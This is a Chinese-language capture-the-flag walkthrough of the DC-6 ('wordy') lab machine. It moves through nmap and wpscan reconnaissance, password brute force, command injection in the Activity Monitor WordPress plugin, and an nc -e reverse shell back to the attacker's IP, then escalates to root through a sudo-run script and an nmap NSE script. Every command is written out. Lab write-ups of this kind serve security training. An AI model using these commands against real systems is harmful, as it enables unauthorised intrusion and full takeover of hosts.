DC靶场的下载、安装与访问在上一篇的文章中。
靶场攻略:
1、使用nmap快速扫描的命令:
nmap -sP --min-hostgroup 1024 --min-parallelism 1024 192.168.120.0/24
识别到靶场主机ip
编辑
2.使用命令:
nmap -A -p- -T4 192.168.120.138
探测靶场突破口,探测到开放了80端口-http服务,22端口-ssh服务。编辑
3.访问80端口,寻找进一步突破口。如果直接使用ip访问会跳转到http://wordy/,而无法正常加载出来。所以需要我们去添加hosts文件,跳转域名来访问靶场ip。
Windows:可以访问本地hosts,打开C:\Windows\System32\drivers\etc,修改hosts文件。
编辑
Linux:在/etc/hosts文件中添加域名。
打开浏览器,访问即可。
编辑 4.如图,可以得知网页用wordpress搭建,可以尝试wpscan进行扫描获得网站用户名。
编辑
wpscan --url wordy -e u
编辑
扫出了五个用户,将五个用户保存在一个文件user.txt里,如图所示。
编辑
靶机作者的提示
编辑
使用提示的命令生成一个字典
cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt
使用wpscan进行爆破
wpscan --url wordy -U user.txt -P passwords.txt
编辑
爆破出一组密码mark/helpdesk01。
编辑
6.使用dirb进行网站目录扫描
dirb http://wordy /usr/share/wordlists/dirb/big.txt
扫描出登陆页面
http://wordy/wp-admin/
编辑
7.用刚刚爆破出来的账号密码进行登录。
编辑
在插件中,找到一个存在漏洞的插件Activity monitor
编辑
根据漏扫说明,在插件的tools界面,存在命令执行漏洞,可以利用进行反弹shell
编辑
使用BP进行抓包,在ip参数后加入要执行的命令,成功执行。
编辑
kali使用命令:nc -lvvp 1234开始监听。
brup修改参数 127.0.0.1 | nc -e /bin/bash 192.168.120.129 1234
编辑
成功接收到反弹的shell。
输入命令:python -c "import pty;pty.spawn('/bin/bash')",得到一个交互shell。
编辑
使用命令:ls -alhR /home,列出/home目录下的所有文件,发现几个隐私文件
编辑
在things-to-do.txt文件中,我们看到了账号和密码。
编辑
通过ssh进行登录,成功登录。
编辑
使用命令:sudo -l
编辑
我们发现graham可以用jens的身份执行 /home/jens/backups.sh
,把 /bin/bash
追加到这个文件,然后用jens的身份执行这个文件的时候就会打开一个具有jens权限的shell
cd /home/jens echo '/bin/bash' >> backups.sh sudo -u jens ./backups.sh
执行 sudo -l
查看一下有没有可以提权的命令。
编辑
发现可以用root权限执行nmap,nmap在早期版本是可以用来提权的,我们来尝试一下nmap提权。将提权代码 os.execute("/bin/sh")
写入一个文件中。
echo 'os.execute("/bin/sh")' > rootshell.nse
然后以root的权限用nmap执行这个脚本:
sudo nmap --script=rootshell.nse
现在就已经提权成功了,可以读取最后的flag了。
cd /root cat theflag.txt
编辑